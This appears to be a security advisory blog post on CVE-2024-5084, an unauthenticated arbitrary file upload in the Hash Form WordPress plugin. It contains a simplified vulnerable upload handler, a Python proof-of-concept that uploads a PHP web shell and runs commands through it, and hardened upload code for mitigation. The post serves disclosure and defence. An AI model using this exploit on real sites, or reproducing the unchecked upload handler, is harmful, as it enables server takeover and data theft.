CVE-2024-5084 - Critical RCE via Arbitrary File Upload in Hash Form – Drag & Drop Form Builder Plugin for WordPress
WordPress sites worldwide rely on plugins to save time and add powerful features. But sometimes, these plugins come with vulnerabilities that can put your entire website at risk. CVE-2024-5084 is one such vulnerability found in the Hash Form – Drag & Drop Form Builder plugin. In this post, we'll break down what this vulnerability is, how attackers can exploit it, and what you should do right now to keep your site safe.
What Is the Hash Form Plugin?
Hash Form – Drag & Drop Form Builder is a popular WordPress plugin that lets you easily create and manage forms using a visual, drag-and-drop interface. It’s used on thousands of websites for anything from contact forms to surveys.
What Is CVE-2024-5084?
CVE-2024-5084 is a critical security flaw affecting all versions of Hash Form up to and including 1.1. Unauthenticated attackers can upload arbitrary files to your server, including PHP code, which can lead to full website takeover.
The Problem
The problem sits in the plugin's file_upload_action function. This function handles file uploads submitted through the forms your visitors fill out, but it fails to check the file type. That means an attacker can upload literally any file, even malicious PHP scripts.
Root Cause
The missing file type/extension validation allows any file to be processed and saved by the vulnerable function.
Vulnerability references:
- WPScan Advisory: wpscan.com/vulnerability/5084
- Patchstack Database
- NVD: CVE-2024-5084
Here's a simplified version of what the unsafe upload handler looked like:

```php
// Vulnerable function in the plugin (simplified)
function file_upload_action() {
    if (isset($_FILES['file'])) {
        $uploaded_file = $_FILES['file'];
        // Destination is built from the client-supplied filename
        $target_path = ABSPATH . '/wp-content/uploads/' . basename($uploaded_file['name']);
        // No file type check!
        move_uploaded_file($uploaded_file['tmp_name'], $target_path);
        echo "File uploaded!";
    } else {
        echo "No file!";
    }
}
```
What’s missing?
There’s no check for allowed file extensions (.jpg, .png, etc.), so an attacker can upload a file like evil.php and it will be accepted.
The attacker then accesses the script in the browser:

https://targetsite.com/wp-content/uploads/evil.php

The script runs, letting the attacker execute any command on the server: full remote code execution.
Exploit: Proof-of-Concept (PoC) Code
Below is a simple Python script demonstrating this exploit. (For educational use only!)

```python
import requests

url = 'https://targetsite.com/path-to-form/'  # Change to vulnerable form URL
files = {
    'file': ('evil.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
}
response = requests.post(url, files=files)
print('Upload response:', response.text)
# The attacker can now visit:
# https://targetsite.com/wp-content/uploads/evil.php?cmd=whoami
```
> Warning: Running exploits without permission is illegal.
Attackers can install malware, deface the website, steal information, or pivot to other servers.
## How To Fix / Mitigation
1. Upgrade to the latest version as soon as an update is available.
2. If no patch is out, replace file_upload_action with secure file upload code that only allows specific, safe file types:

```php
// Extension allowlist check, placed before move_uploaded_file()
$allowed_types = array('jpg', 'jpeg', 'png', 'gif', 'pdf');
$file_ext = pathinfo($uploaded_file['name'], PATHINFO_EXTENSION);
if (!in_array(strtolower($file_ext), $allowed_types, true)) {
    die("Invalid file type!");
}
```

3. Review your wp-content/uploads directory for unknown, suspicious files, and delete anything you didn't upload.
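As an added example (not the plugin's own code), here is a hardened replacement for the handler that relies on WordPress's built-in upload validation instead of a hand-rolled extension check; the hook name, nonce name and the `$_FILES['file']` field are assumptions.

```php
<?php
// Added example, not the plugin's code. Hardened upload handler using
// WordPress APIs. Hook, nonce and field names are hypothetical.
function hardened_file_upload_action() {
    // 1. Reject requests that do not carry a valid nonce for this action.
    $nonce = isset( $_POST['hashform_upload_nonce'] ) ? wp_unslash( $_POST['hashform_upload_nonce'] ) : '';
    if ( ! wp_verify_nonce( $nonce, 'hashform_upload' ) ) {
        wp_send_json_error( 'Invalid request.', 403 );
    }
    if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( 'No file!', 400 );
    }

    // 2. Allowlist of extensions and the MIME type each must match.
    $allowed_mimes = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'pdf'      => 'application/pdf',
    );

    // 3. Validate extension AND content. wp_check_filetype_and_ext() inspects
    //    image bytes, so "evil.php" renamed to "evil.jpg" is rejected as well.
    $file     = $_FILES['file'];
    $filename = sanitize_file_name( $file['name'] );
    $check    = wp_check_filetype_and_ext( $file['tmp_name'], $filename, $allowed_mimes );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'Invalid file type!', 415 );
    }
    // Use the corrected name if WordPress found the claimed extension was wrong.
    if ( ! empty( $check['proper_filename'] ) ) {
        $file['name'] = $check['proper_filename'];
    }

    // 4. Let WordPress move the file: 'mimes' restricts it to the allowlist and
    //    the stored name is sanitized and made unique inside the uploads dir.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed_mimes ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }
    wp_send_json_success( array( 'url' => $result['url'] ) );
}
add_action( 'wp_ajax_hashform_upload', 'hardened_file_upload_action' );
add_action( 'wp_ajax_nopriv_hashform_upload', 'hardened_file_upload_action' );
```

Pair this with a web-server rule that refuses to execute scripts under wp-content/uploads, so even a future validation bypass cannot turn an uploaded file into remote code execution.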
References and Further Reading
- Official Plugin Page
- WPScan Advisory for CVE-2024-5084
- Patchstack Vulnerability Database - Hash Form
- OWASP Secure File Upload Guide
Final Thoughts
CVE-2024-5084 is easy to exploit, and the damage can be total. If you use Hash Form, check your sites now. Always validate and sanitize file uploads in custom plugins and themes.
Stay safe—keep your plugins up to date, and follow trusted security news!
Timeline
Published on: 05/23/2024 15:15:15 UTC
Last modified on: 06/04/2024 18:02:40 UTC